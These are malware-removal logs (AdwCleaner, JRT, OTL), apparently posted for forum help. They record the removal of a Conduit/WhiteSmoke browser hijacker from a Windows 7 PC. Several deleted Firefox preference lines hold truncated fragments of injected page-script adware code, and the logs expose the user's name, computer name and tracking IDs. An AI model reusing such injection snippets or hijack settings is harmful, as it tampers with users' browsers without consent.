-\\ Mozilla Firefox v24.0 (en-US)

[ File : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\prefs.js ]

Line Deleted : user_pref("CT3291327_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1381036403027,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Deleted : user_pref("CT3310511.FF19Solved", "true");
Line Deleted : user_pref("CT3310511.UserID", "UN31848007282642620");
Line Deleted : user_pref("CT3310511.browser.search.defaultthis.engineName", "true");
Line Deleted : user_pref("CT3310511.fullUserID", "UN31848007282642620.IN.20130912161507");
Line Deleted : user_pref("CT3310511.installDate", "12/09/2013 16:15:09");
Line Deleted : user_pref("CT3310511.installSessionId", "{CF045630-8858-4E4C-8AC2-1A0C1FBA56A5}");
Line Deleted : user_pref("CT3310511.installSp", "TRUE");
Line Deleted : user_pref("CT3310511.installerVersion", "1.7.0.9");
Line Deleted : user_pref("CT3310511.keyword", "true");
Line Deleted : user_pref("CT3310511.originalHomepage", "about:home");
Line Deleted : user_pref("CT3310511.originalSearchAddressUrl", "");
Line Deleted : user_pref("CT3310511.originalSearchEngine", "");
Line Deleted : user_pref("CT3310511.originalSearchEngineName", "");
Line Deleted : user_pref("CT3310511.searchRevert", "false");
Line Deleted : user_pref("CT3310511.searchUserMode", "2");
Line Deleted : user_pref("CT3310511.smartbar.homepage", "true");
Line Deleted : user_pref("CT3310511.versionFromInstaller", "10.20.0.13");
Line Deleted : user_pref("CT3310511.xpeMode", "0");
Line Deleted : user_pref("CT3316751.1000082.isPlayDisplay", "true");
Line Deleted : user_pref("CT3316751.1000082.state", "{\"state\":\"stopped\",\"text\":\"1.FM (Cou...\",\"description\":\"1.FM (Country)\",\"url\":\"hxxp://1.fm/wm/energycountry32k.asx\"}");
Line Deleted : user_pref("CT3316751.ENABALE_HISTORY", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Deleted : user_pref("CT3316751.ENABLE_RETURN_WEB_SEARCH_ON_THE_PAGE", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Deleted : user_pref("CT3316751.FF19Solved", "true");
Line Deleted : user_pref("CT3316751.FirstTime", "true");
Line Deleted : user_pref("CT3316751.FirstTimeFF3", "true");
Line Deleted : user_pref("CT3316751.SearchFromAddressBarUrl", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3316751&SearchSource=2&CUI=UN90980652230335158&UM=2&q=");
Line Deleted : user_pref("CT3316751.UserID", "UN90980652230335158");
Line Deleted : user_pref("CT3316751.addressBarTakeOverEnabledInHidden", "true");
Line Deleted : user_pref("CT3316751.browser.search.defaultthis.engineName", "true");
Line Deleted : user_pref("CT3316751.countryCode", "US");
Line Deleted : user_pref("CT3316751.defaultSearch", "true");
Line Deleted : user_pref("CT3316751.embeddedsData", "[{\"appId\":\"130257782731295810\",\"apiPermissions\":{\"crossDomainAjax\":true,\"getMainFrameTitle\":true,\"getMainFrameUrl\":true,\"getSearchTerm\":true,\"insta[...]
Line Deleted : user_pref("CT3316751.enableAlerts", "true");
Line Deleted : user_pref("CT3316751.enableSearchFromAddressBar", "true");
Line Deleted : user_pref("CT3316751.enlargeSearchBox", "{\"enabled\":true,\"maxWidth\":1000,\"minWidth\":250,\"width\":500}");
Line Deleted : user_pref("CT3316751.firstTimeDialogOpened", "true");
Line Deleted : user_pref("CT3316751.fixPageNotFoundError", "true");
Line Deleted : user_pref("CT3316751.fixPageNotFoundErrorByUser", "true");
Line Deleted : user_pref("CT3316751.fixPageNotFoundErrorInHidden", "true");
Line Deleted : user_pref("CT3316751.fullUserID", "UN90980652230335158.IN.20131206000622");
Line Deleted : user_pref("CT3316751.hxxp___api28_starwebnet_com.pid2.enc", "NTY4YzVkMDQtNGEyNS0xMGUwLTQ4N2EtNjJkZjYwNTk2MjU2");
Line Deleted : user_pref("CT3316751.installDate", "06/12/2013 00:07:04");
Line Deleted : user_pref("CT3316751.installId", "9818");
Line Deleted : user_pref("CT3316751.installSessionId", "{2DFAA01D-BC71-4CF5-A5A3-6A74E5B15690}");
Line Deleted : user_pref("CT3316751.installSp", "TRUE");
Line Deleted : user_pref("CT3316751.installType", "conduitnsisintegration");
Line Deleted : user_pref("CT3316751.installUsageEarly", "2013-12-06T23:41:41.8989398+03:00");
Line Deleted : user_pref("CT3316751.installerVersion", "1.8.1.4");
Line Deleted : user_pref("CT3316751.isCheckedStartAsHidden", true);
Line Deleted : user_pref("CT3316751.isEnableAllDialogs", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Deleted : user_pref("CT3316751.isFirstTimeToolbarLoading", "false");
Line Deleted : user_pref("CT3316751.isToolbarShrinked", "{\"dataType\":\"string\",\"data\":\"false\"}");
Line Deleted : user_pref("CT3316751.keyword", "true");
Line Deleted : user_pref("CT3316751.lastNewTabSettings", "{\"isEnabled\":true,\"newTabUrl\":\"hxxp://search.conduit.com/?ctid=CT3316751&octid=CT3316751&SearchSource=15&CUI=UN90980652230335158&SSPV=&Lay=1&UM=2\"}");
Line Deleted : user_pref("CT3316751.lastVersion", "10.22.5.10");
Line Deleted : user_pref("CT3316751.mam_gk_installer_preapproved.enc", "ZmFsc2U=");
Line Deleted : user_pref("CT3316751.navigationAliasesJson", "{\"EB_MAIN_FRAME_URL\":\"\",\"EB_MAIN_FRAME_TITLE\":\"\",\"EB_SEARCH_TERM\":\"\",\"EB_TOOLBAR_SUB_DOMAIN\":\"hxxp://WhiteSmokeNew12.OurToolbar.com/\",\"EB[...]
Line Deleted : user_pref("CT3316751.openThankYouPage", "false");
Line Deleted : user_pref("CT3316751.openUninstallPage", "true");
Line Deleted : user_pref("CT3316751.originalHomepage", "hxxp://myserp.net/?source=hp&w=49408&t=4&s=1");
Line Deleted : user_pref("CT3316751.originalSearchAddressUrl", "hxxp://websearch.search-guide.info/?pid=1182&r=2013/10/31&hid=8196839351945351958&lg=EN&cc=US&unqvl=40&l=1&q=");
Line Deleted : user_pref("CT3316751.originalSearchEngine", "MySerp");
Line Deleted : user_pref("CT3316751.originalSearchEngineName", "MySerp");
Line Deleted : user_pref("CT3316751.revertSettingsEnabled", "true");
Line Deleted : user_pref("CT3316751.search.searchAppId", "130257782731295810");
Line Deleted : user_pref("CT3316751.search.searchCount", "0");
Line Deleted : user_pref("CT3316751.searchFromAddressBarEnabledByUser", "true");
Line Deleted : user_pref("CT3316751.searchInNewTabEnabledByUser", "true");
Line Deleted : user_pref("CT3316751.searchInNewTabEnabledInHidden", "true");
Line Deleted : user_pref("CT3316751.searchRevert", "true");
Line Deleted : user_pref("CT3316751.searchSuggestEnabledByUser", "true");
Line Deleted : user_pref("CT3316751.searchUninstallUserMode", "2");
Line Deleted : user_pref("CT3316751.searchUserMode", "2");
Line Deleted : user_pref("CT3316751.selectToSearchBoxEnabled", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Deleted : user_pref("CT3316751.serviceLayer_service_login_isFirstLoginInvoked", "{\"dataType\":\"boolean\",\"data\":\"true\"}");
Line Deleted : user_pref("CT3316751.serviceLayer_service_login_loginCount", "{\"dataType\":\"number\",\"data\":\"3\"}");
Line Deleted : user_pref("CT3316751.serviceLayer_service_toolbarGrouping_activeCTID", "{\"dataType\":\"string\",\"data\":\"CT3316751\"}");
Line Deleted : user_pref("CT3316751.serviceLayer_service_toolbarGrouping_activeDownloadUrl", "{\"dataType\":\"string\",\"data\":\"hxxp://WhiteSmokeNew12.OurToolbar.com//xpi\"}");
Line Deleted : user_pref("CT3316751.serviceLayer_service_toolbarGrouping_activeToolbarName", "{\"dataType\":\"string\",\"data\":\"WhiteSmoke New 1.2 \"}");
Line Deleted : user_pref("CT3316751.serviceLayer_service_toolbarGrouping_invoked", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Deleted : user_pref("CT3316751.serviceLayer_service_usage_toolbarUsageCount", "{\"dataType\":\"number\",\"data\":\"1\"}");
Line Deleted : user_pref("CT3316751.serviceLayer_services_Configuration_lastUpdate", "1386318303937");
Line Deleted : user_pref("CT3316751.serviceLayer_services_appTrackingFirstTime_lastUpdate", "1386370611743");
Line Deleted : user_pref("CT3316751.serviceLayer_services_appsMetadata_lastUpdate", "1386370611294");
Line Deleted : user_pref("CT3316751.serviceLayer_services_gottenAppsContextMenu_lastUpdate", "1386370611788");
Line Deleted : user_pref("CT3316751.serviceLayer_services_installUsage_ToolbarInstallEarly_lastUpdate", "1386318303765");
Line Deleted : user_pref("CT3316751.serviceLayer_services_login_10.22.5.10_lastUpdate", "1386370611468");
Line Deleted : user_pref("CT3316751.serviceLayer_services_otherAppsContextMenu_lastUpdate", "1386370611921");
Line Deleted : user_pref("CT3316751.serviceLayer_services_searchAPI_lastUpdate", "1386318303979");
Line Deleted : user_pref("CT3316751.serviceLayer_services_serviceMap_lastUpdate", "1386318301861");
Line Deleted : user_pref("CT3316751.serviceLayer_services_toolbarContextMenu_lastUpdate", "1386370611531");
Line Deleted : user_pref("CT3316751.serviceLayer_services_toolbarSettings_lastUpdate", "1386370611701");
Line Deleted : user_pref("CT3316751.serviceLayer_services_translation_lastUpdate", "1386370611514");
Line Deleted : user_pref("CT3316751.settingsINI", true);
Line Deleted : user_pref("CT3316751.shouldFirstTimeDialog", "false");
Line Deleted : user_pref("CT3316751.showToolbarPermission", "false");
Line Deleted : user_pref("CT3316751.smartbar.CTID", "CT3316751");
Line Deleted : user_pref("CT3316751.smartbar.Uninstall", "0");
Line Deleted : user_pref("CT3316751.smartbar.homepage", "true");
Line Deleted : user_pref("CT3316751.smartbar.toolbarName", "WhiteSmoke New 1.2 ");
Line Deleted : user_pref("CT3316751.startPage", "true");
Line Deleted : user_pref("CT3316751.toolbarBornServerTime", "6-12-2013");
Line Deleted : user_pref("CT3316751.toolbarCurrentServerTime", "7-12-2013");
Line Deleted : user_pref("CT3316751.toolbarInstallDate", "06-12-2013 00:06:23");
Line Deleted : user_pref("CT3316751.toolbarLoginClientTime", "Fri Dec 06 2013 14:56:50 GMT-0800 (Pacific Standard Time)");
Line Deleted : user_pref("CT3316751.versionFromInstaller", "10.22.5.10");
Line Deleted : user_pref("CT3316751.xpeMode", "0");
Line Deleted : user_pref("CT3316751_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1386370607163,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Deleted : user_pref("Smartbar.ConduitHomepagesList", "hxxp://search.conduit.com/?ctid=CT3316751&octid=CT3316751&SearchSource=61&CUI=UN90980652230335158&UM=2&UP=SPF4507863-6D16-4B5C-927A-47437945D119");
Line Deleted : user_pref("Smartbar.ConduitSearchEngineList", "WhiteSmoke New 1.2 Customized Web Search");
Line Deleted : user_pref("Smartbar.ConduitSearchUrlList", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3316751&SearchSource=2&CUI=UN90980652230335158&UM=2&q=");
Line Deleted : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "hxxp://websearch.search-guide.info/?pid=1182&r=2013/10/31&hid=8196839351945351958&lg=EN&cc=US&unqvl=40&l=1&q=");
Line Deleted : user_pref("Smartbar.keywordURLSelectedCTID", "CT3316751");
Line Deleted : user_pref("browser.search.defaultenginename", "WhiteSmoke New 1.2 Customized Web Search");
Line Deleted : user_pref("browser.search.defaultthis.engineName", "WhiteSmoke New 1.2 Customized Web Search");
Line Deleted : user_pref("browser.search.defaulturl", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3316751&CUI=UN90980652230335158&UM=2&SearchSource=3&q={searchTerms}");
Line Deleted : user_pref("browser.search.order.1", "WebSearch");
Line Deleted : user_pref("browser.search.order.1,S", "WebSearch");
Line Deleted : user_pref("browser.search.selectedEngine", "WhiteSmoke New 1.2 Customized Web Search");
Line Deleted : user_pref("browser.startup.homepage", "hxxp://search.conduit.com/?ctid=CT3316751&octid=CT3316751&SearchSource=61&CUI=UN90980652230335158&UM=2&UP=SPF4507863-6D16-4B5C-927A-47437945D119");
Line Deleted : user_pref("extensions.URQQR1S.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.protocol.indexOf('hxxp')>-1 && window.self==window.top &[...]
Line Deleted : user_pref("extensions.ZAakLUMfg3R.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};(function(){if(window.self==window.top&&!document.getElementById('shk85shssm[...]
Line Deleted : user_pref("extensions.ayUaxM98STww.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;[...]
Line Deleted : user_pref("extensions.zg1A.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.protocol.indexOf('hxxp')>-1 && window.self==window.top && ![...]
Line Deleted : user_pref("keyword.URL", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3316751&SearchSource=2&CUI=UN90980652230335158&UM=2&q=");
Line Deleted : user_pref("plugin.state.npconduitfirefoxplugin", 2);
Line Deleted : user_pref("smartbar.addressBarOwnerCTID", "CT3316751");
Line Deleted : user_pref("smartbar.conduitHomepageList", "hxxp://search.conduit.com/?ctid=CT3310511&CUI=UN31848007282642620&UM=2&SearchSource=13,hxxp://search.conduit.com/?ctid=CT3291327&CUI=UN24295512825661793&UM=2[...]
Line Deleted : user_pref("smartbar.conduitSearchAddressUrlList", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3310511&SearchSource=2&CUI=UN31848007282642620&UM=2&q=,hxxp://search.conduit.com/ResultsExt.aspx?cti[...]
Line Deleted : user_pref("smartbar.defaultSearchOwnerCTID", "CT3316751");
Line Deleted : user_pref("smartbar.homePageOwnerCTID", "CT3316751");
Line Deleted : user_pref("smartbar.machineId", "URB3+CAP7TODJK55GNM6LYVGA+PWVK5UNUFTA4RA4I4B43IYOR/O7NBFZJELUN5AR5MEHM/A0JJKG6LU0TSYKW");
Line Deleted : user_pref("smartbar.originalHomepage", "hxxp://search.conduit.com/?ctid=CT3316751&CUI=UN90980652230335158&UM=2&SearchSource=13");
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_calledSetupService", "31");
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_calledSetupService.storedInFile", false);
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_currentVersion", "312E31312E352E31");
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_currentVersion.storedInFile", false);
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_globalKeysMigratedToLocalStorage", "31");
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_globalKeysMigratedToLocalStorage.storedInFile", false);
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_localization.storedInFile", true);
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_migrated_from_ls", "31");
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_migrated_from_ls.storedInFile", false);
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_settings1.11.5.1.storedInFile", true);
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_stamp", "313034335F30");
Line Deleted : user_pref("valueApps.CT3316751.mam_gk_stamp.storedInFile", false);

-\\ Google Chrome v31.0.1650.63

[ File : C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted : urls_to_restore_on_startup

*************************

AdwCleaner[R0].txt - [12756 octets] - [21/08/2013 12:56:16]
AdwCleaner[R1].txt - [12817 octets] - [21/08/2013 13:02:29]
AdwCleaner[R2].txt - [30828 octets] - [07/12/2013 18:20:17]
AdwCleaner[S0].txt - [12284 octets] - [21/08/2013 13:03:06]
AdwCleaner[S1].txt - [30219 octets] - [07/12/2013 18:27:16]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [30280 octets] ##########

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.0.8 (11.05.2013:1)
OS: Windows 7 Home Premium x64
Ran by Jon Lowry on Sat 12/07/2013 at 18:13:34.29
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-538650268-2924358156-1730836174-1000\Software\sweetim
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{58A73424-8E34-4585-BE7D-CB75CFC2385B}



~~~ Files

Successfully deleted: [File] "C:\Users\Jon Lowry\appdata\locallow\SkwConfig.bin"
Successfully deleted: [File] C:\Windows\syswow64\shoAB1B.tmp



~~~ Folders

Successfully deleted: [Folder] "C:\Users\Jon Lowry\appdata\local\cre"
Successfully deleted: [Empty Folder] C:\Users\Jon Lowry\appdata\local\{13AAEA7C-A162-4C42-8E88-AED1A2E9AF32}
Successfully deleted: [Empty Folder] C:\Users\Jon Lowry\appdata\local\{5C2457EE-186D-4C44-9B7D-B824186847BB}
Successfully deleted: [Empty Folder] C:\Users\Jon Lowry\appdata\local\{63970F83-30D3-4095-BB92-736E6CC50423}
Successfully deleted: [Empty Folder] C:\Users\Jon Lowry\appdata\local\{7971B3C8-800C-4FBF-8383-5849DE5E2F91}
Successfully deleted: [Empty Folder] C:\Users\Jon Lowry\appdata\local\{F39F5CC2-ED3F-4116-957C-BD5042C83BA9}



~~~ FireFox

Emptied folder: C:\Users\Jon Lowry\AppData\Roaming\mozilla\firefox\profiles\8mzbhq3r.default\minidumps [25 files]



~~~ Chrome

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Google\Chrome\Extensions\banjjklfojcdbofbhbgiedekefohoaff
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Google\Chrome\Extensions\banjjklfojcdbofbhbgiedekefohoaff



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 12/07/2013 at 18:24:32.84
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OTL logfile created on: 12/7/2013 6:12:08 PM - Run 6
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Jon Lowry\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.10.9200.16736)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

3.80 Gb Total Physical Memory | 2.03 Gb Available Physical Memory | 53.37% Memory free
7.60 Gb Paging File | 5.48 Gb Available in Paging File | 72.08% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 465.46 Gb Total Space | 147.75 Gb Free Space | 31.74% Space Free | Partition Type: NTFS

Computer Name: WOLFLING | User Name: Jon Lowry | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/12/06 15:09:59 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Jon Lowry\Desktop\OTL.exe
PRC - [2013/12/03 18:48:06 | 000,863,184 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2013/06/05 09:28:40 | 027,370,808 | ---- | M] (Dropbox, Inc.) -- C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\Dropbox.exe
PRC - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2013/04/04 14:50:32 | 000,532,040 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
PRC - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
PRC - [2012/02/15 12:58:00 | 000,577,408 | ---- | M] (Hewlett-Packard Development Company, L.P.) -- C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
PRC - [2012/02/15 12:58:00 | 000,034,872 | ---- | M] (Hewlett-Packard Development Company, L.P.) -- C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
PRC - [2012/01/03 05:10:42 | 000,063,928 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2011/03/21 10:56:16 | 001,230,704 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
PRC - [2010/08/02 11:14:22 | 000,136,488 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
PRC - [2010/05/21 01:28:36 | 000,140,272 | ---- | M] (CinemaNow, Inc.) -- C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
PRC - [2010/04/13 08:57:58 | 000,013,336 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2010/04/13 08:57:56 | 000,284,696 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
PRC - [2010/03/18 11:57:02 | 002,320,920 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
PRC - [2010/03/18 11:56:56 | 000,268,824 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe


========== Modules (No Company Name) ==========

MOD - [2013/12/03 18:48:04 | 000,399,312 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ppgooglenaclpluginchrome.dll
MOD - [2013/12/03 18:48:02 | 004,055,504 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\pdf.dll
MOD - [2013/12/03 18:47:11 | 000,702,416 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\libglesv2.dll
MOD - [2013/12/03 18:47:11 | 000,099,792 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\libegl.dll
MOD - [2013/12/03 18:47:08 | 001,619,408 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ffmpegsumo.dll
MOD - [2013/10/17 11:25:48 | 008,866,472 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll
MOD - [2013/10/09 12:29:19 | 012,436,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ef0a534be135cd8f0d99d938d8b1814a\System.Windows.Forms.ni.dll
MOD - [2013/10/09 12:28:32 | 003,348,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\4eef5a3a4d0ed6d6fd882947a70df530\WindowsBase.ni.dll
MOD - [2013/10/09 12:28:22 | 000,978,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\29f3ae8d313e62b4daed1107ccd29f9f\System.Configuration.ni.dll
MOD - [2013/09/10 23:59:46 | 011,914,752 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Web\6ebbfafc5521934f7e1c154937a2788b\System.Web.ni.dll
MOD - [2013/09/10 23:58:53 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\d473c19e69818875b9c739cad8f386a5\System.Runtime.Remoting.ni.dll
MOD - [2013/08/15 00:45:27 | 000,452,608 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\a65a89dc687715adf46de23e717b842b\IAStorUtil.ni.dll
MOD - [2013/08/15 00:23:16 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5aa44bce7933e4de09d935848f868a4b\System.Drawing.ni.dll
MOD - [2013/08/15 00:22:53 | 005,464,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\09db78d6068543df01862a023aca785a\System.Xml.ni.dll
MOD - [2013/08/15 00:22:41 | 007,989,760 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\5d22a30e587e2cac106b81fb351e7c08\System.ni.dll
MOD - [2013/07/09 22:26:12 | 011,499,520 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9a6c1b7af18b4d5a91dc7f8d6617522f\mscorlib.ni.dll
MOD - [2013/03/13 12:48:52 | 024,978,944 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\libcef.dll
MOD - [2012/11/13 15:32:50 | 003,558,400 | ---- | M] () -- C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\wxmsw28uh_vc.dll
MOD - [2011/03/21 10:57:34 | 000,096,112 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2011/03/21 10:56:16 | 001,230,704 | ---- | M] () -- C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe


========== Services (SafeList) ==========

SRV:64bit: - [2013/05/26 21:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2013/04/12 10:29:36 | 000,534,824 | ---- | M] (Aventail Corporation) [Auto | Running] -- C:\Windows\SysNative\ngvpnmgr.exe -- (NgVpnMgr)
SRV:64bit: - [2010/09/22 18:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV:64bit: - [2010/06/24 15:24:12 | 000,315,392 | ---- | M] (Realtek Semiconductor Corp.) [Auto | Running] -- C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe -- (RtVOsdService)
SRV:64bit: - [2010/06/18 15:26:18 | 000,103,992 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe -- (HP Wireless Assistant Service)
SRV:64bit: - [2009/11/17 18:14:26 | 000,098,208 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe -- (AERTFilters)
SRV:64bit: - [2009/07/13 17:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\svchost.exe -- (RemoteAccess)
SRV - [2013/11/17 23:57:39 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013/10/05 21:14:29 | 000,118,680 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013/07/01 17:13:30 | 004,569,856 | ---- | M] () [Auto | Running] -- c:\program files (x86)\common files\akamai/netsession_win_8fa3539.dll -- (Akamai)
SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/11/06 19:00:04 | 005,814,392 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Stopped] -- C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe -- (AVGIDSAgent)
SRV - [2012/10/22 13:05:08 | 000,196,664 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Stopped] -- C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe -- (avgwd)
SRV - [2012/09/27 10:55:16 | 000,086,528 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe -- (HP Support Assistant Service)
SRV - [2012/07/13 12:28:36 | 000,160,944 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012/02/15 12:58:00 | 000,034,872 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe -- (HPWMISVC)
SRV - [2012/01/03 05:10:42 | 000,063,928 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
